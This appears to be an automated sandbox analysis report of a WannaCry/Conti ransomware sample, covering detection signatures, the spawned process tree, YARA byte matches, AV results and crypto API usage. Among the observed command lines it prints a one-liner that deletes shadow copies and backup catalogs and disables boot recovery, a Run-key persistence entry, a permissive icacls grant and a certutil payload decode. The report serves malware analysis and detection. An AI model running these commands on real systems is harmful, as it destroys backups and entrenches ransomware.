Windows Analysis Report
WannaCry.cmd

Overview

General Information

Sample Name: WannaCry.cmd
Analysis ID: 866427
MD5: 8da35604db8350a0bbb7ac41e0609bb3
SHA1: 6160e62c45e1fe8028da7aa8b9f5c1a4d9bf22c3
SHA256: 5badd8294b5ab8aebdaef9cef14176ceb4765f170414042e828903e092d93686

Detection

Wannacry, Conti
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Conti ransomware
Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Sigma detected: Delete shadow copy via WMIC
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Installs TOR (Internet Anonymizer)
Creates files in the recycle bin to hide itself
Found Tor onion address
Command shell drops VBS files
Uses bcdedit to modify the Windows boot settings
Drops PE files to the document folder of the user
Modifies existing user documents (likely ransomware behavior)
Contains functionality to modify clipboard data
Opens the same file many times (likely Sandbox evasion)
Writes many files with high entropy
Contains functionality to change the wallpaper
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Deletes shadow drive data (may be related to ransomware)
Moves itself to temp directory
Contains functionality to detect sleep reduction / modifications
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses reg.exe to modify the Windows registry
Found evaded block containing many API calls
PE file contains more sections than normal
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64native
  • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • msg.exe (PID: 1268 cmdline: msg * Has Sido Hackeado! MD5: B42553599E40029366A0FD8F81079BED)
    • certutil.exe (PID: 4112 cmdline: certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk" MD5: BD8D9943A9B1DEF98EB83E0FA48796C2)
    • WannaCrypt0r.sk (PID: 1300 cmdline: WannaCrypt0r.sk MD5: 84C82835A5D21BBCF75A61706D8AB549)
      • attrib.exe (PID: 1704 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • icacls.exe (PID: 7224 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskdl.exe (PID: 7432 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c 198851684139341.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cscript.exe (PID: 7964 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
      • taskdl.exe (PID: 5740 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 5136 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 6000 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 8620 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • @WanaDecryptor@.exe (PID: 2380 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • taskhsvc.exe (PID: 4232 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
          • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 2144 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • @WanaDecryptor@.exe (PID: 6116 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
          • cmd.exe (PID: 8692 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • WMIC.exe (PID: 832 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)
      • WmiPrvSE.exe (PID: 9112 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
      • taskse.exe (PID: 4028 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 7668 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • cmd.exe (PID: 4512 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4792 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • taskdl.exe (PID: 7684 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 5552 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 5596 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 6776 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 7608 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 3056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 2572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 2012 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 3492 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 3996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 3028 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 8548 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup
Name: WannaCryptor, WannaCry, WannaCrypt
Attribution: Lazarus Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Name: Conti, Conti Lock
Description: Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

No configs have been found
Source: C:\@Please_Read_Me@.txt, Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Author: Florian Roth (Nextron Systems)
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
Source: C:\Users\user\Desktop\WANNACRY.bin, Rule: SUSP_certificate_payload, Description: Detects payloads that pretend to be certificates, Author: Didier Stevens, Florian Roth
  • 0x0:$re1: -----BEGIN CERTIFICATE-----
Source: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security

Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: Win32_Ransomware_WannaCry, Description: unknown, Author: ReversingLabs
  • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
  • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
  • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security
Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, Rule: Win32_Ransomware_WannaCry, Description: unknown, Author: ReversingLabs
  • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
  • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
  • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security

                  Operating System Destruction

                  Source: Process started, Author: Joe Security, Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 6116, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 8692, ProcessName: cmd.exe
                  No Snort rule has matched

                  AV Detection

                  Source: WannaCry.cmd, Virustotal: Detection: 25%
                  Source: C:\@WanaDecryptor@.exe, Avira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk, Avira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exe, Avira: detection malicious, Label: TR/FileCoder.724645
                  Source: C:\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, ReversingLabs: Detection: 94%
                  Source: C:\Users\user\Desktop\taskdl.exe, ReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\taskse.exe, ReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\u.wnry, ReversingLabs: Detection: 96%
                  Source: C:\Users\user\Documents\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\user\Downloads\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\Default\Desktop\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\Users\Public\Desktop\@WanaDecryptor@.exe, ReversingLabs: Detection: 96%
                  Source: C:\@WanaDecryptor@.exe, Joe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,25_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_004046B0 CryptAcquireContextA,25_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 25_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,25_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,28_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,28_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,28_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_004046F0 CryptImportKey,28_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_004046B0 CryptAcquireContextA,28_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,28_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 28_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,28_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,37_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,37_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,37_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_004046F0 CryptImportKey,37_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_004046B0 CryptAcquireContextA,37_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,37_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Code function: 37_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,37_2_004047C0
                  Source: taskhsvc.exe, 0000001D.00000003.4995126218.000000000370F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: -----BEGIN RSA PUBLIC KEY-----
                  Source: unknown, HTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49840 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49865 version: TLS 1.2
                  Source: Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbileson Data\Appl source: WannaCrypt0r.sk, 00000005.00000003.3701556589.000000000374D000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3741172069.000000000374E000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3699237993.0000000003743000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DC:\Users\All Users\Application Data\Application Data\SoftwareDistributionoudStore8bbwed.pdb8bbw source: WannaCrypt0r.sk, 00000005.00000003.3698905000.0000000002594000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3742479647.0000000002599000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3697563659.0000000002545000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,28_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,28_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,28_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,37_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,37_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,37_2_004026B0
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE034.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE033.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE037.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE038.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDE035.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDE036.tmpJump to behavior

                  Networking

                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
